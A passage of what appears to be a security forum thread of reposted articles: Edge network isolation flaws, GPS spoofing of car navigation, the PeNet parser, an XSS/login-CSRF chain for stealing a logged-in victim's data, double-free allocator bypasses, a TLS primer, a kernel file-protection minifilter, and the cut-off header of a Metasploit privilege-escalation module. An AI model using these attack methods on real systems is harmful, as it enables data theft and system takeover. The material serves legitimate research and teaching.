● The package family check isn’t very restrictive; combined with the weak permissions of the RPC service, it allows any Edge process to add an arbitrary exemption.
● The exemption isn’t linked to the calling process, so any SID can be added as an exemption.
While it seems the default is only to allow the Internet-facing ACs access to localhost, because of these weaknesses, if you compromised a Flash process (which is child AC “006”) it could add itself as an exemption and try to attack services listening on localhost. It would make more sense if only the main MicrosoftEdge process could add the exemptions, not any content process. But what would make the most sense would be to support this functionality through a capability, so that everyone could take advantage of it rather than implementing it as a backdoor.

Sursa: https://tyranidslair.blogspot.com/2018/07/uwp-localhost-network-isolation-and-edge.html
14. July 19, 2018

Using a HackRF to Spoof GPS Navigation in Cars and Divert Drivers

Researchers at Virginia Tech, the University of Electronic Science and Technology of China and Microsoft recently released a paper discussing how they were able to perform a GPS spoofing attack that diverted drivers to a wrong destination (pdf) without being noticed. The hardware they used to perform the attack was low cost and made from off-the-shelf components: a Raspberry Pi 3, a HackRF SDR, a small whip antenna and a mobile battery pack, for a total cost of only $225. The HackRF is a transmit-capable SDR.

The idea is to use the HackRF to create a fake GPS signal that causes Google Maps running on an Android phone to believe that its current location is different. They use a clever algorithm that ensures the spoofed GPS location remains consistent with the actual physical road network, to avoid the driver noticing that anything is wrong. The attack is limited in that it relies on the driver paying attention only to the turn-by-turn directions, not looking closely at the map, and not already knowing the roads. For example, spoofing to a nearby location on another road can make the GPS give the wrong 'left/right' audio direction. However, in their real world tests they were able to show that 95% of test subjects followed the spoofed navigation to an incorrect destination.

In past posts we've seen the HackRF and other transmit-capable SDRs used to spoof GPS in other situations too. For example, some players of the once popular Pokemon Go augmented reality game cheated by using a HackRF to spoof GPS. Others have used GPS spoofing to bypass drone no-fly restrictions, and to divert a superyacht. It is also believed that the Iranian government used GPS spoofing to safely divert and capture an American stealth drone back in 2011. Other researchers are working on making GPS more robust: Aerospace Corp. are using a HackRF to try to fuse GPS together with other localization methods, such as localizing signals from radio towers and other satellites. [Also seen on Arstechnica]

[Image: Hardware and method used to spoof car GPS navigation.]

Sursa: https://www.rtl-sdr.com/using-a-hackrf-to-spoof-gps-navigation-in-cars-and-divert-drivers/
15. PeNet

PeNet is a parser for Windows Portable Executable headers. It is completely written in C# and does not rely on any native Windows APIs. Furthermore, it supports the creation of Import Hashes (ImpHash), a feature often used in malware analysis. You can extract the Certificate Revocation List, compute different hash sums and do other useful stuff for working with PE files. For help see the Wiki. The API reference can be found here: http://secana.github.io/PeNet

License
Apache 2, Copyright 2016 Stefan Hausotte

Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0. Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.

Sursa: https://github.com/secana/PeNet
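The ImpHash mentioned in the PeNet README is built by hashing a PE file's normalized import list. As a rough illustration of the general concept, here is a Python sketch of the commonly used imphash scheme (this is not PeNet's C# implementation, and the exact normalization rules, such as which extensions get stripped, are assumptions here):

```python
import hashlib

def imphash(imports):
    """Compute an import hash from (dll, function) pairs.

    Common scheme: lowercase "dll.function" entries with the DLL
    extension stripped, joined by commas, then MD5-hashed. Import
    order matters, which is what makes the hash useful for
    clustering samples built from the same source.
    """
    parts = []
    for dll, func in imports:
        dll = dll.lower()
        for ext in (".dll", ".ocx", ".sys"):
            if dll.endswith(ext):
                dll = dll[: -len(ext)]
        parts.append("%s.%s" % (dll, func.lower()))
    return hashlib.md5(",".join(parts).encode()).hexdigest()

# Two samples importing the same APIs in the same order share a hash;
# normalization makes filename case irrelevant.
a = imphash([("KERNEL32.dll", "CreateFileW"), ("ADVAPI32.dll", "RegOpenKeyExW")])
b = imphash([("kernel32.DLL", "CreateFileW"), ("advapi32.dll", "RegOpenKeyExW")])
print(a == b)  # True
```

Reordering the imports produces a different hash, which is why imphash survives recompilation but not relinking.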
16. Escalating Low Severity Bugs To High Severity

This time I am gonna share some ways that I have learned & applied while participating in bounty programs, with which I was able to escalate Low severity issues to higher severity. Let's go straight to the technical details.

Note: You might also be able to use a Window object instead of an Iframe in the following cases, but it's better to use an "Iframe" instead of a "Window" to be stealthier and require the least user interaction, though that requires Clickjacking to be present too.

Case #1. Self Stored-XSS and Login-Logout CSRF

Pre-Requisites:
1.) Victim must be logged in on the application
2.) Some kind of sensitive information of the currently authenticated user should be present on some page (via Web API etc.)

ATTACKER having Self-Stored XSS in profile description:

Attack Summary:
1. Victim visits the attacker's page.
2. Create 2 Iframes:
Frame #1 (VICTIM) pointing to the sensitive info page (e.g. credit cards, API keys, secrets, password hashes, messages etc. which are only visible to the authenticated user)
Frame #2 (ATTACKER) pointing to the Self-Stored XSS page
3. Perform the following on the attacker page once Frame #1 has loaded completely:
a) Log out from the victim's account
b) Log in to the attacker's/your account using the login CSRF
c) In Frame #2, execute the Self-Stored XSS in your (attacker's) account, access Frame #1 using top.frames[0].document.body.outerHTML (since both frames are now same-origin), steal the info and send it to your server

Full article: https://www.noob.ninja/2018/07/escalating-low-severity-bugs-to-high.html
17. double-free-examples

Basic code examples of conditions that still work, and other nuances relating to double frees, primarily in glibc and to a lesser extent tcmalloc and jemalloc. These primarily revolve around one very basic concept: many allocators "optimize" the double-free security checks to only ensure that we are not deallocating the most recently deallocated chunk. This leads to the behavior that if you can deallocate one chunk, then a different one, then the prior one a second time, you can bypass the sanity checks. This pattern holds with tcmalloc (Chrome et cetera), jemalloc (Firefox) and glibc (Linux).

Furthermore, the way of the world is moving towards things like vtable/vptr verification and control-flow semantics to detect and prevent the corruption of function pointers, much as the stack cookie did for return addresses, and GCC now ships with vtable verification. In some instances, we have some rather neat conditions where you can bypass vptr verification and have 2 objects occupy the same memory, a sort of Schrodinger's object condition. There is at present no real method for preventing the related attacks beyond ensuring that double-free conditions do not occur.

(Atlanta, Seattle - as the paper was moving along, my work contract was suddenly canceled and relocated to SEA, where I was never given time to work on anything until I punted with the expectation that BH would come back after editing and review. I'm probably the reason they have a board for that sort of thing now, just like I'm probably the reason the SF86 has that last page on it now.)

Sursa: https://github.com/jnferguson/double-free-examples
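The "only check the most recently freed chunk" optimization described above can be modeled with a toy free list. This Python sketch mimics only the logic of the check; it is not the code of glibc, tcmalloc or jemalloc:

```python
class ToyAllocator:
    """Models allocators that compare a freed pointer only against the
    head of the free list, as described in the README above."""

    def __init__(self):
        self.free_list = []

    def free(self, chunk):
        # The "optimized" double-free check: only the most recently
        # freed chunk is compared against the incoming pointer.
        if self.free_list and self.free_list[-1] == chunk:
            raise RuntimeError("double free detected")
        self.free_list.append(chunk)

heap = ToyAllocator()
heap.free("A")
try:
    heap.free("A")          # free(A); free(A) -> caught by the check
except RuntimeError as e:
    print("caught:", e)

heap = ToyAllocator()
heap.free("A")
heap.free("B")
heap.free("A")              # free(A); free(B); free(A) -> slips through
print(heap.free_list)       # ['A', 'B', 'A'] - chunk A is on the list twice
```

Once the same chunk sits on the free list twice, two subsequent allocations can return the same memory, which is the starting point for the exploitation patterns the repository demonstrates.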
18. SSL/TLS for dummies part 1: Ciphersuite, Hashing, Encryption

June 22, 2018

As a security enthusiast, I have always been fond of the workings of SSL (TLS these days). It took me days to understand the very basic working of this complex protocol, but once you understand the underlying concepts and algorithms, the entire protocol feels quite simple. I learned a lot of things while studying how SSL works, encryption being the first. I started recollecting the cryptography stuff I learned at university. Back then I was like "meh" while studying it; now I know why my teachers fed me all that encryption material, and how much cryptography makes my life easier. I wanted to share everything I learned here at my space, and I definitely hope it will be useful to you. So let's begin.

History of SSL

When talking about the history of SSL, one shouldn't miss the Mozilla Foundation. The first thing that comes to mind when talking about Mozilla is their famous browser Firefox, which according to various sources is the most popular browser after Chrome and Safari. But Netscape was the great predecessor of Firefox, and during the 90's it was the most popular browser among internet surfers. Anyway, with the introduction of Internet Explorer by Microsoft, Netscape's era came to an end; later they started the great Mozilla Foundation, and it still grows.

Netscape introduced SSL in 1994 for its Netscape Navigator browser. The primary objective was to prevent Man In The Middle attacks. Later, with the increase in internet accessibility, banks started to use the internet for transactions. At that time security was a major concern, and the IETF (Internet Engineering Task Force), the people who standardize internet protocols, standardized SSL by making their own version. This was in 1999, and the protocol is now known as TLS (Transport Layer Security), the latest version being TLS 1.3.
Few notes about cryptography

First things first: before digging deep into the topic, we need a basic understanding of a couple of things. The most important one is cryptography. You don't need to be a cryptography expert to understand SSL, but a basic understanding is necessary. We will discuss the very basics here. Those who already know asymmetric and symmetric key encryption can skip this section and go to the next part.

So cryptography deals with numbers and strings. Basically every digital thing in the entire universe is numbers. And when I say numbers, I mean 0 & 1: binary. The images you see on screen, the music you listen to through your earphones, everything is binary. But our ears and eyes will not understand binaries, right? Only the brain can understand that, and even if it could understand binaries, it can't enjoy them. So we convert the binaries to human understandable formats such as mp3, jpg, etc. Let's term this process Encoding. It's a two-way process and can easily be decoded back to its original form.

Hashing

Hashing is another cryptography technique in which data, once converted to some other form, can never be recovered. In layman's terms, there is no process called de-hashing. There are many hash functions to do the job, such as sha-512, md5 and so on. The sha-512 value of wst.space is:

83d98e97ec1efc3cb4d20f81a246bff06a1c145b7c06c481defed6ef31ce6ad78db3ecb36e7ce097966f019eab7bdc7ffa6b3fb8c5226871667ae13a6728c63b

You can verify this by going to some online hash creator website and typing wst.space. If the original value cannot be recovered, then where do we use this? Passwords! When you set up a password for your mobile or PC, a hash of your password is created and stored in a secure place. When you make a login attempt next time, the entered string is again hashed with the same algorithm (hash function) and the output is matched with the stored value. If it's the same, you get logged in. Otherwise you are thrown out.
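This hash-and-compare login flow can be demonstrated with Python's hashlib (a generic sketch; the password and variable names are made up for illustration):

```python
import hashlib

def sha512_hex(s):
    # One-way: easy to compute, no "de-hashing" exists.
    return hashlib.sha512(s.encode()).hexdigest()

stored = sha512_hex("hunter2")   # what the system keeps; the plaintext is never stored

def login(attempt):
    # Hash the attempt with the same algorithm and compare with the
    # stored value, exactly as described above.
    return sha512_hex(attempt) == stored

print(login("hunter2"))   # True
print(login("hunter3"))   # False
print(len(stored))        # 128 hex characters (sha-512 outputs 64 bytes)
```

Running the same input always yields the same digest, which is why the comparison works, and why the dictionary attack described next is possible against weak passwords.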
Credits: wikimedia

By applying a hash to the password, we can ensure that an attacker will never get our password even if he steals the stored password file. The attacker will only have the hash of the password. He can probably find a list of the most commonly used passwords, apply sha-512 to each of them and compare the results with the value in his hand. This is called a dictionary attack. But how long would he have to do this? If your password is random enough, do you think this method of cracking would work? We discussed session cookies in one of our blog posts; the values in session cookies are usually hashed. All the passwords in the databases of Facebook, Google and Amazon are hashed, or at least they are supposed to be hashed.

Then there is Encryption

Encryption lies in between hashing and encoding. Encoding is a two-way process and should not be used to provide security. Encryption is also a two-way process, but the original data can be retrieved if and only if the encryption key is known. If you don't know how encryption works, don't worry, we will discuss the basics here. That will be enough to understand the basics of SSL. There are two types of encryption, namely Symmetric and Asymmetric encryption.

Symmetric Key Encryption

I am trying to keep things as simple as I can, so let's understand symmetric encryption by means of a shift algorithm. This algorithm encrypts alphabets by shifting the letters to either left or right. Let's take the string CRYPTO and consider the number +3. Then the encrypted form of CRYPTO will be FUBSWR: each letter is shifted to the right by 3 places. Here, the word CRYPTO is called the Plaintext, the output FUBSWR is called the Ciphertext, the value +3 is called the Encryption key (symmetric key), and the whole process is a cipher. This is one of the oldest and most basic symmetric key encryption algorithms, and its first usage was reported during the time of Julius Caesar.
So, it was named after him and it is the famous Caesar Cipher. Anyone who knows the encryption key can apply the reverse of Caesar's algorithm and retrieve the original Plaintext. Hence it is called Symmetric Encryption.

Credits: Wikimedia

Can we use symmetric cryptography with TLS?

As you can see, this algorithm is pretty easy to crack since the possibilities are few. We can change the value of the key from 1 upwards and iterate through the 26 letters one by one. Note that the value of the key is limited to 26, provided we are encrypting only lower-case English alphabets. It's a matter of milliseconds for our computers to brute-force this process. Nowadays there are complex algorithms such as AES (Advanced Encryption Standard) and 3DES (Triple Data Encryption Algorithm), which are considered extremely difficult to crack. This is the encryption technique used in SSL/TLS while sending and receiving data. But the client and server need to agree upon a key and exchange it before starting to encrypt the data, right? The initial step of exchanging the key will obviously be in plain text. What if an attacker captures the key while it is being shared? Then there is no point in using it. So we need a secure mechanism to exchange the key without an attacker actually seeing it. Here comes the role of Asymmetric Key Encryption.

Asymmetric Key Encryption

We know that in symmetric encryption the same key is used for both encryption and decryption. Once that key is stolen, all the data is gone. That's a huge risk and we need a more complex technique. In 1976, Whitfield Diffie and Martin Hellman first published the concept of asymmetric encryption, and the algorithm was known as the Diffie-Hellman key exchange. Then in 1978, Ron Rivest, Adi Shamir and Leonard Adleman of MIT published the RSA algorithm. These can be considered the foundations of asymmetric cryptography. Compared to symmetric encryption, in asymmetric encryption there are two keys instead of one.
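Before getting to the two keys, the Caesar cipher described above is worth seeing in code; this short Python sketch also shows the 26-key brute force that makes it so weak:

```python
def caesar(text, key):
    # Shift each uppercase letter right by `key` places, wrapping at Z.
    return "".join(chr((ord(c) - ord("A") + key) % 26 + ord("A")) for c in text)

ciphertext = caesar("CRYPTO", 3)
print(ciphertext)              # FUBSWR, as in the example above

print(caesar(ciphertext, -3))  # decrypting with the shared key: CRYPTO

# Brute force: only 26 possible keys, so just try them all.
for key in range(26):
    print(key, caesar(ciphertext, -key))
# key 3 yields CRYPTO - milliseconds of work, which is why real
# protocols use ciphers like AES instead of simple shifts.
```

The same `key` decrypts what it encrypted, which is exactly the "symmetric" property discussed here.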
One is called the Public key, and the other one is the Private key. Theoretically, during initiation we can generate the Public-Private key pair on our machine. The Private key should be kept in a safe place and should never be shared with anyone. The Public key, as the name indicates, can be shared with anyone who wishes to send encrypted text to you. Now, those who have your public key can encrypt the secret data with it. If the key pair were generated using the RSA algorithm, then they should use the same algorithm while encrypting the data; usually the algorithm is specified in the public key. The encrypted data can only be decrypted with the private key, which is owned by you.

Can we use Asymmetric encryption for all of TLS?

Asymmetric encryption is also known as Public Key Infrastructure, a.k.a. PKI; the reason is self-explanatory. Anyway, as long as you keep the private key secure, the data is safe. Great! So by now you are probably thinking: why would we still use symmetric encryption in TLS when we have a perfectly secure PKI in place? Agreed, but it should be noted that security has to be provided without hurting usability. Since PKI involves a double key architecture and the key length is usually large, the encryption-decryption overhead is very high: it takes more time and CPU compared to symmetric key encryption. So when sending and receiving data between client and server, the user would feel longer wait times and the browser would start to eat the CPU. Therefore PKI is used only to exchange the symmetric key between the client and server; thereafter symmetric key encryption comes into play, and further data transmission makes use of this technique.

Well, I know I am just beating around the bush here, because I haven't really jumped into the topic yet. Please keep the things we have discussed so far in mind and come back to this space. We are going deep from the next blog post.

Sursa: https://www.wst.space/ssl-part1-ciphersuite-hashing-encryption/
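The hybrid approach the article describes, public-key math used once to agree on a symmetric key, can be sketched with a toy Diffie-Hellman exchange in Python. The numbers here are deliberately tiny and for illustration only; real TLS uses primes of 2048+ bits or elliptic curves:

```python
import random

# Public parameters, known to everyone (toy-sized on purpose).
p = 23   # a prime modulus
g = 5    # a generator

# Each side picks a private value and publishes only g^x mod p.
a = random.randrange(1, p - 1)   # client's secret, never transmitted
b = random.randrange(1, p - 1)   # server's secret, never transmitted
A = pow(g, a, p)                 # sent over the wire in plain text
B = pow(g, b, p)                 # sent over the wire in plain text

# Both sides derive the same shared secret without ever sending it:
# (g^b)^a == (g^a)^b (mod p).
client_key = pow(B, a, p)
server_key = pow(A, b, p)
print(client_key == server_key)  # True - this becomes the symmetric key
```

An eavesdropper sees p, g, A and B, but recovering a or b from them (the discrete logarithm problem) is what keeps the derived symmetric key secret.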
19. Kernel Mode Rootkits: File Deletion Protection

dtm, waifu pillow collector

Hey guys, back with just another casual article from me this time around, since one of my projects failed miserably and I don't really have the time for another serious one. Also, I've been getting into something new; as you may have already guessed, kernel-mode development! Yeah, pretty exciting stuff, and I'm here to share a little something I've learned that might be interesting to you all. Brace yourselves!

Disclaimer: The following article documents what I've learned and may or may not be completely accurate because I am very new to this. Of course I would never intentionally provide misinformation to this community, but please approach it relatively lightly. If there are any mistakes, please do not hesitate to inform me so I can fix them. I would also like to apologise for any garbage code, I can't help it. :')

Windows Kernel Mode Drivers and I/O Request Packets

So just really briefly, since this is not an article about kernel mode or drivers in general, I will describe some basic concepts that will aid in understanding the content I will present. The first thing is what's called an "I/O Request Packet" (IRP for short), which represents the majority of what is delivered to the operating system and drivers. This can be things like a file request or a keyboard key press. What happens with IRPs and drivers is that the IRP is sent down a "stack" of drivers that are registered (with the I/O manager) to process them. It looks something like this:

[Image: I/O request flow diagram, obtained from http://www.windowsbugcheck.com/2017/05/device-objects-and-driver-stack-part-2.html]

The IRP falls down the stack until it reaches the device or driver that is capable of handling the specified request, and then it will get sent back upwards once it is fulfilled. Note that the IRP does not necessarily have to go all the way down to the bottom to be completed.
File Deletion Protection Here I will present the high-level conceptual overview on how it is possible to protect a file from being deleted. The condition which I have selected in order for this mechanism to prevent a file from deletion is that the file must have the .PROTECTED extension (case-insensitive). Previously, I have described that IRPs must be sent down the driver stack until the bottom or until it can be completed. If a special driver can be slotted into a position in the driver stack before whatever fulfills the targeted IRPs, it has the power to filter the request and interrupt or modify it if desired. This notion serves as the core to the file deletion protection mechanism. In order to detect if IRPs should be interrupted from deletion, it simply needs to extract the file extension and compare it to whatever is disallowed for deletion. If the extensions match, the driver will prevent the IRP from any further processing by completing the request and sending it back up the driver stack with an error. It may look a little something like this: ^ +------------+ | +> | Driver 1 | <+ IRP being sent down | +------------+ | the driver stack. | ... | (If file should be | +------------+ | (If the file should not protected, send it ----> +- | Our driver | <+ be protected, continue back up prematurely.) +------------+ sending it down.) ... +------------+ | Driver n | +------------+ ... +------------+ | Device | +------------+ Anti Delete So time for some juicy code to put theory to practice. The following code is example code of a “minifilter” driver which mainly handles file system requests. // The callbacks array defines what IRPs we want to process. CONST FLT_OPERATION_REGISTRATION Callbacks[] = { { IRP_MJ_CREATE, 0, PreAntiDelete, NULL }, // DELETE_ON_CLOSE creation flag. { IRP_MJ_SET_INFORMATION, 0, PreAntiDelete, NULL }, // FileInformationClass == FileDispositionInformation(Ex). 
    { IRP_MJ_OPERATION_END }
};

CONST FLT_REGISTRATION FilterRegistration = {
    sizeof(FLT_REGISTRATION),   // Size
    FLT_REGISTRATION_VERSION,   // Version
    0,                          // Flags
    NULL,                       // ContextRegistration
    Callbacks,                  // OperationRegistration
    Unload,                     // FilterUnloadCallback
    NULL,                       // InstanceSetupCallback
    NULL,                       // InstanceQueryTeardownCallback
    NULL,                       // InstanceTeardownStartCallback
    NULL,                       // InstanceTeardownCompleteCallback
    NULL,                       // GenerateFileNameCallback
    NULL,                       // NormalizeNameComponentCallback
    NULL                        // NormalizeContextCleanupCallback
};

PFLT_FILTER Filter;
static UNICODE_STRING ProtectedExtention = RTL_CONSTANT_STRING(L"PROTECTED");

NTSTATUS DriverEntry(_In_ PDRIVER_OBJECT DriverObject, _In_ PUNICODE_STRING RegistryPath) {
    // We can use this to load some configuration settings.
    UNREFERENCED_PARAMETER(RegistryPath);

    DBG_PRINT("DriverEntry called.\n");

    // Register the minifilter with the filter manager.
    NTSTATUS status = FltRegisterFilter(DriverObject, &FilterRegistration, &Filter);
    if (!NT_SUCCESS(status)) {
        DBG_PRINT("Failed to register filter: <0x%08x>.\n", status);
        return status;
    }

    // Start filtering I/O.
    status = FltStartFiltering(Filter);
    if (!NT_SUCCESS(status)) {
        DBG_PRINT("Failed to start filter: <0x%08x>.\n", status);
        // If we fail, we need to unregister the minifilter.
        FltUnregisterFilter(Filter);
    }

    return status;
}

First of all, the IRPs that should be processed by the driver are IRP_MJ_CREATE and IRP_MJ_SET_INFORMATION, which are the requests made when a file (or directory) is created and when metadata is being set, respectively. Both of these IRPs have the ability to delete a file, which will be detailed later. The Callbacks array is defined with the respective IRP to be processed and the pre-operation and post-operation callback functions. The pre-operation defines the function that is called when the IRP goes down the stack, while the post-operation is the function that is called when the IRP goes back up after it has been completed. 
Note that the post-operation is NULL, as this scenario does not require one; the interception of file deletion is handled only in the pre-operation. DriverEntry is the driver's main function, where registration with the filter manager is performed using FltRegisterFilter. Once that is successful, the driver must call the FltStartFiltering function with the filter handle to start filtering IRPs. Also note that we have defined the extension to protect as .PROTECTED, as mentioned above.

It is also good practice to define an unload function so that if the driver is requested to stop, it can perform any necessary cleanups. Its inclusion in this article is purely for completeness and does not serve any purpose for the main content.

/*
 * This is the driver unload routine used by the filter manager.
 * When the driver is requested to unload, it will call this function
 * and perform the necessary cleanups.
 */
NTSTATUS Unload(_In_ FLT_FILTER_UNLOAD_FLAGS Flags) {
    UNREFERENCED_PARAMETER(Flags);

    DBG_PRINT("Unload called.\n");

    // Unregister the minifilter.
    FltUnregisterFilter(Filter);

    return STATUS_SUCCESS;
}

The final function in this code is the PreAntiDelete pre-operation callback, which handles the IRP_MJ_CREATE and IRP_MJ_SET_INFORMATION IRPs. IRP_MJ_CREATE covers functions that request a "file handle or file object or device object"[1] to be opened, such as ZwCreateFile. IRP_MJ_SET_INFORMATION covers functions that request to set "metadata about a file or a file handle"[2], such as ZwSetInformationFile.

/*
 * This routine is called every time I/O is requested for:
 * - file creates (IRP_MJ_CREATE) such as ZwCreateFile and
 * - file metadata sets on files or file handles
 *   (IRP_MJ_SET_INFORMATION) such as ZwSetInformationFile.
 *
 * This is a pre-operation callback routine, which means that the
 * IRP passes through this function on the way down the driver stack
 * to the respective device or driver to be handled. 
 */
FLT_PREOP_CALLBACK_STATUS PreAntiDelete(_Inout_ PFLT_CALLBACK_DATA Data,
                                        _In_ PCFLT_RELATED_OBJECTS FltObjects,
                                        _Flt_CompletionContext_Outptr_ PVOID *CompletionContext) {
    UNREFERENCED_PARAMETER(CompletionContext);

    /*
     * This pre-operation callback code should be running at
     * IRQL <= APC_LEVEL as stated in the docs:
     * https://docs.microsoft.com/en-us/windows-hardware/drivers/ifs/writing-preoperation-callback-routines
     * and both ZwCreateFile and ZwSetInformationFile are also run at
     * IRQL == PASSIVE_LEVEL:
     * - ZwCreateFile: https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/content/ntifs/nf-ntifs-ntcreatefile#requirements
     * - ZwSetInformationFile: https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/content/ntifs/nf-ntifs-ntsetinformationfile#requirements
     */
    PAGED_CODE();

    /*
     * By default, we don't want to call the post-operation routine
     * because there's no need to further process it and also
     * because there is none.
     */
    FLT_PREOP_CALLBACK_STATUS ret = FLT_PREOP_SUCCESS_NO_CALLBACK;

    // We don't care about directories.
    BOOLEAN IsDirectory;
    NTSTATUS status = FltIsDirectory(FltObjects->FileObject, FltObjects->Instance, &IsDirectory);
    if (NT_SUCCESS(status)) {
        if (IsDirectory == TRUE) {
            return ret;
        }
    }

    /*
     * We don't want anything that doesn't have the DELETE_ON_CLOSE
     * flag.
     */
    if (Data->Iopb->MajorFunction == IRP_MJ_CREATE) {
        if (!FlagOn(Data->Iopb->Parameters.Create.Options, FILE_DELETE_ON_CLOSE)) {
            return ret;
        }
    }

    /*
     * We don't want anything that doesn't have either
     * FileDispositionInformation or FileDispositionInformationEx or
     * file renames (which can just simply rename away the extension). 
     */
    if (Data->Iopb->MajorFunction == IRP_MJ_SET_INFORMATION) {
        switch (Data->Iopb->Parameters.SetFileInformation.FileInformationClass) {
            case FileRenameInformation:
            case FileRenameInformationEx:
            case FileDispositionInformation:
            case FileDispositionInformationEx:
            case FileRenameInformationBypassAccessCheck:
            case FileRenameInformationExBypassAccessCheck:
            case FileShortNameInformation:
                break;
            default:
                return ret;
        }
    }

    /*
     * Here we can check if we want to allow a specific process to fall
     * through the checks, e.g. our own application.
     * Since this is a PASSIVE_LEVEL operation, we can assume(?) that
     * the thread context is the thread that requested the I/O. We can
     * check the current thread and compare the EPROCESS of the
     * authenticated application like so:
     *
     * if (IoThreadToProcess(Data->Thread) == UserProcess) {
     *     return FLT_PREOP_SUCCESS_NO_CALLBACK;
     * }
     *
     * Of course, we would need to find and save the EPROCESS of the
     * application somewhere first. Something like a communication port
     * could work.
     */

    PFLT_FILE_NAME_INFORMATION FileNameInfo = NULL;
    // Make sure the file object exists.
    if (FltObjects->FileObject != NULL) {
        // Get the file name information with the normalized name.
        status = FltGetFileNameInformation(Data, FLT_FILE_NAME_NORMALIZED | FLT_FILE_NAME_QUERY_DEFAULT, &FileNameInfo);
        if (NT_SUCCESS(status)) {
            // Now we want to parse the file name information to get the extension.
            FltParseFileNameInformation(FileNameInfo);

            // Compare the file extension (case-insensitive) and check if it is protected.
            if (RtlCompareUnicodeString(&FileNameInfo->Extension, &ProtectedExtention, TRUE) == 0) {
                DBG_PRINT("Protecting file deletion/rename!");
                // Strings match, deny access!
                Data->IoStatus.Status = STATUS_ACCESS_DENIED;
                Data->IoStatus.Information = 0;
                // Complete the I/O request and send it back up.
                ret = FLT_PREOP_COMPLETE;
            }

            // Clean up file name information. 
            FltReleaseFileNameInformation(FileNameInfo);
        }
    }

    return ret;
}

For IRP_MJ_CREATE, we want to check for the FILE_DELETE_ON_CLOSE create option, which is described as "Delete the file when the last handle to it is passed to NtClose. If this flag is set, the DELETE flag must be set in the DesiredAccess parameter."[3] If this flag is not present, we do not care about the request, so it is passed down the stack for further processing, as represented by the FLT_PREOP_SUCCESS_NO_CALLBACK return value. Note that NO_CALLBACK means the post-operation routine should not be called when the IRP is completed and passed back up the stack; this is what the function should always return, as there is no post-operation.

For IRP_MJ_SET_INFORMATION, the FileInformationClass parameter should be checked. The FileDispositionInformation value is described as "Usually, sets the DeleteFile member of a FILE_DISPOSITION_INFORMATION to TRUE, so the file can be deleted when NtClose is called to release the last open handle to the file object. The caller must have opened the file with the DELETE flag set in the DesiredAccess parameter."[4] To prevent the file from simply being renamed such that the protected extension no longer exists, the FileRenameInformation and FileShortNameInformation values must also be checked.

If the driver receives an IRP request that is selected for file deletion, it must parse the file name information to extract the extension, using the FltGetFileNameInformation and FltParseFileNameInformation functions. Then it is a simple string comparison between the extension of the file requested for deletion and the protected extension to determine whether the delete operation should be allowed. In the case of an unauthorised file deletion, the status of the operation is set to STATUS_ACCESS_DENIED and the pre-operation function completes the IRP. 
Demonstration

Attempt to delete the file:

[Screenshot: VirtualBox_Windows 7 x86 Kernel Development_17_07_2018_00_59_09.png]

Attempt to rename the file:

[Screenshot: VirtualBox_Windows 7 x86 Kernel Development_17_07_2018_00_59_24.png]

FIN

Hope that was educational and somewhat interesting or motivational. As usual, you can find the code on my GitHub. Thanks for reading!

Source: https://0x00sec.org/t/kernel-mode-rootkits-file-deletion-protection/7616
  20. ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = GreatRanking

  include Msf::Post::Linux::Priv
  include Msf::Post::Linux::System
  include Msf::Post::Linux::Kernel
  include Msf::Post::File
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Linux BPF Sign Extension Local Privilege Escalation',
      'Description'    => %q{
        Linux kernel prior to 4.14.8 utilizes the Berkeley Packet Filter (BPF)
        which contains a vulnerability where it may improperly perform sign
        extension. This can be utilized to escalate privileges.

        The target system must be compiled with BPF support and must not have
        kernel.unprivileged_bpf_disabled set to 1.

        This module has been tested successfully on:
        Debian 9.0 kernel 4.9.0-3-amd64;
        Deepin 15.5 kernel 4.9.0-deepin13-amd64;
        ElementaryOS 0.4.1 kernel 4.8.0-52-generic;
        Fedora 25 kernel 4.8.6-300.fc25.x86_64;
        Fedora 26 kernel 4.11.8-300.fc26.x86_64;
        Fedora 27 kernel 4.13.9-300.fc27.x86_64;
        Gentoo 2.2 kernel 4.5.2-aufs-r;
        Linux Mint 17.3 kernel 4.4.0-89-generic;
        Linux Mint 18.0 kernel 4.8.0-58-generic;
        Linux Mint 18.3 kernel 4.13.0-16-generic;
        Mageia 6 kernel 4.9.35-desktop-1.mga6;
        Manjaro 16.10 kernel 4.4.28-2-MANJARO;
        Solus 3 kernel 4.12.7-11.current;
        Ubuntu 14.04.1 kernel 4.4.0-89-generic;
        Ubuntu 16.04.2 kernel 4.8.0-45-generic;
        Ubuntu 16.04.3 kernel 4.10.0-28-generic;
        Ubuntu 17.04 kernel 4.10.0-19-generic;
        ZorinOS 12.1 kernel 4.8.0-39-generic.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Jann Horn',  # Discovery
          'bleidl',     # Discovery and get-rekt-linux-hardened.c exploit
          'vnik',       # upstream44.c exploit
          'rlarabee',   # cve-2017-16995.c exploit
          'h00die',     # Metasploit
          'bcoles'      # Metasploit
        ],
      'DisclosureDate' => 'Nov 12 2017',
      'Platform'       => [ 'linux' ],
      'Arch'           => [ ARCH_X86, ARCH_X64 ],
      'SessionTypes'   => [ 'shell', 'meterpreter' ],
      'Targets'        => [[ 'Auto', {} ]],
      'Privileged'     => true,
      'References'     =>
        [
          [ 'AKA', 'get-rekt-linux-hardened.c' ],
          [ 'AKA', 'upstream44.c' ],
          [ 'BID', '102288' ],
          [ 'CVE', '2017-16995' ],
          [ 'EDB', '44298' ],
          [ 'EDB', '45010' ],
          [ 'URL', 'https://github.com/rlarabee/exploits/blob/master/cve-2017-16995/cve-2017-16995.c' ],
          [ 'URL', 'https://github.com/brl/grlh/blob/master/get-rekt-linux-hardened.c' ],
          [ 'URL', 'http://cyseclabs.com/pub/upstream44.c' ],
          [ 'URL', 'https://blog.aquasec.com/ebpf-vulnerability-cve-2017-16995-when-the-doorman-becomes-the-backdoor' ],
          [ 'URL', 'https://ricklarabee.blogspot.com/2018/07/ebpf-and-analysis-of-get-rekt-linux.html' ],
          [ 'URL', 'https://www.debian.org/security/2017/dsa-4073' ],
          [ 'URL', 'https://usn.ubuntu.com/3523-2/' ],
